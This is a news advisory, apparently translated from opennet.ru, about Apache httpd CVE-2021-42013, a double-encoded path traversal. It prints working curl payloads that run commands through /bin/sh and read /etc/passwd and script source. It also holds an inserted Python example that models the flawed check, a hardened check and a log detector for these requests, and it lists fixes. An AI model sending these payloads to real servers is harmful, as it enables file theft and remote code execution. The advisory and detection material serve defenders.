A new vulnerability in Apache httpd allows access outside the site root directory

A new attack vector has been identified in the Apache http server that remained unfixed in the 2.4.50 update and allows access to files located outside the site root directory. In addition, the researchers found a method that, given certain non-standard settings, allows not only reading system files but also remotely executing code on the server. The problem only affects releases 2.4.49 and 2.4.50; earlier versions are not affected. Apache httpd 2.4.51 was released promptly to eliminate the new vulnerability.

At its core, the new issue (CVE-2021-42013) is entirely analogous to the original vulnerability (CVE-2021-41773) in 2.4.49; the only difference is a different encoding of the ".." characters. Specifically, release 2.4.50 blocked the use of the "%2e" sequence to mask a dot, but the possibility of double encoding was missed: when the sequence "%%32%65" is supplied, the server decodes it first into "%2e" and then into ".", so the "../" sequence for moving to the parent directory can be encoded as ".%%32%65/".

As for exploiting the vulnerability for code execution, this is possible if mod_cgi is enabled and the base path being used permits execution of CGI scripts (for example, if a ScriptAlias directive applies to it or the ExecCGI flag is set in the Options directive). A further prerequisite for a successful attack is that the Apache configuration explicitly grants access to directories containing executables, such as /bin, or to the file system root "/". Since such access is rarely granted, the code execution attack has little applicability to real systems.

At the same time, the attack for obtaining the contents of arbitrary system files and the source code of web scripts readable by the user under which the http server runs remains relevant. To carry out such an attack it is enough for the site to have a directory configured with the "Alias" or "ScriptAlias" directive (DocumentRoot alone is not sufficient), such as "cgi-bin".

An example of an attack that runs the "id" utility on the server:

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'

uid=1(daemon) gid=1(daemon) groups=1(daemon)

An example of requests that display the contents of /etc/passwd and of one of the web scripts (to dump a script's source code, a directory defined via the "Alias" directive, in which script execution is not enabled, must be used as the base directory):

curl 'http://192.168.0.1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
curl 'http://192.168.0.1/aliaseddir/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/usr/local/apache2/cgi-bin/test.cgi'
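The following is an added example, not code from the article or from the Apache project. It models the decoding behaviour described above and the two kinds of check a practitioner cares about: a simplified single-decode traversal check in the spirit of the 2.4.50 fix (an assumption about its shape, not the server's actual ap_normalize_path code), which the ".%%32%65/" sequence slips past, and a hardened check that percent-decodes until the string stops changing and then verifies that the resolved path still lies under the alias prefix. It also scans a few constructed access-log lines (the 192.0.2.x clients, timestamps and sizes are made up) for requests like the curl examples above, which Apache logs with their raw, still-encoded URI.

```python
"""Added example (not from the article or Apache httpd): double-encoded
traversal ('.%%32%65/') against a single-decode check, a hardened check,
and a detector for the request pattern in access logs."""
import posixpath
import re
from urllib.parse import unquote

# A '..' path segment, either at the start or between slashes.
TRAVERSAL_SEGMENT = re.compile(r"(?:^|/)\.\.(?:/|$)")


def decode_once(path: str) -> str:
    """One pass of percent-decoding. '%%32%65' -> '%2e' (the leading '%%' is
    not valid hex, so that '%' survives and only '%32' and '%65' decode)."""
    return unquote(path)


def decode_fully(path: str, max_passes: int = 5) -> str:
    """Decode repeatedly until the string no longer changes, bounded so a
    pathological input cannot loop forever."""
    for _ in range(max_passes):
        decoded = decode_once(path)
        if decoded == path:
            break
        path = decoded
    return path


def single_decode_check_allows(path: str) -> bool:
    """Simplified model of a one-pass check (assumption, not the real 2.4.50
    code): decode once, then reject any '..' segment. Double-encoded dots are
    still '%2e' after the single pass and are therefore not recognised."""
    return TRAVERSAL_SEGMENT.search(decode_once(path)) is None


def resolve_target(path: str) -> str:
    """Fully decode, then collapse '.' and '..' segments the way the file
    system would, to see which file the request actually reaches."""
    return posixpath.normpath(decode_fully(path))


def hardened_check_allows(path: str, alias_prefix: str) -> bool:
    """Decode until stable, normalise, and accept only if the resolved path
    is the alias prefix itself or something beneath it."""
    resolved = resolve_target(path)
    prefix = alias_prefix.rstrip("/")
    return resolved == prefix or resolved.startswith(prefix + "/")


# Constructed sample lines in Apache common log format (not real traffic).
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [05/Oct/2021:12:00:01 +0000] "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 200 1290',
    '192.0.2.11 - - [05/Oct/2021:12:00:02 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1" 200 48',
    '192.0.2.12 - - [05/Oct/2021:12:00:03 +0000] "GET /cgi-bin/.%2e/.%2e/etc/passwd HTTP/1.1" 403 199',
    '192.0.2.13 - - [05/Oct/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 45',
]

REQUEST_LINE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/')


def flag_traversal_requests(log_lines):
    """Return (client, method, resolved_path) for every request whose fully
    decoded path contains a '..' segment. Denied attempts (403) are flagged
    too: the point is to see who is probing, not only who succeeded."""
    hits = []
    for line in log_lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        decoded = decode_fully(m.group("path"))
        if TRAVERSAL_SEGMENT.search(decoded):
            hits.append((m.group("client"), m.group("method"), posixpath.normpath(decoded)))
    return hits


if __name__ == "__main__":
    probe = "/cgi-bin/.%%32%65/.%%32%65/etc/passwd"
    print("after one decode :", decode_once(probe))
    print("fully decoded    :", decode_fully(probe))
    print("single-decode ok :", single_decode_check_allows(probe))
    print("hardened ok      :", hardened_check_allows(probe, "/cgi-bin"))
    for hit in flag_traversal_requests(SAMPLE_ACCESS_LOG):
        print("traversal attempt:", hit)
```

The single-decode model lets the double-encoded probe through while rejecting the plain "%2e" form, which is exactly the gap between CVE-2021-41773 and CVE-2021-42013; the hardened check rejects both because it judges the resolved target rather than the surface encoding. Scanning raw access logs with the same decode-until-stable step finds the probes regardless of how many encoding layers were used.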

The problem mainly affects continuously updated distributions such as Fedora, Arch Linux and Gentoo, as well as the FreeBSD ports. Packages in the stable branches of the conservative server distributions Debian, RHEL, Ubuntu and SUSE are not affected by the vulnerability. The problem also does not occur if access to directories is explicitly denied with the "Require all denied" setting.

Source: opennet.ru
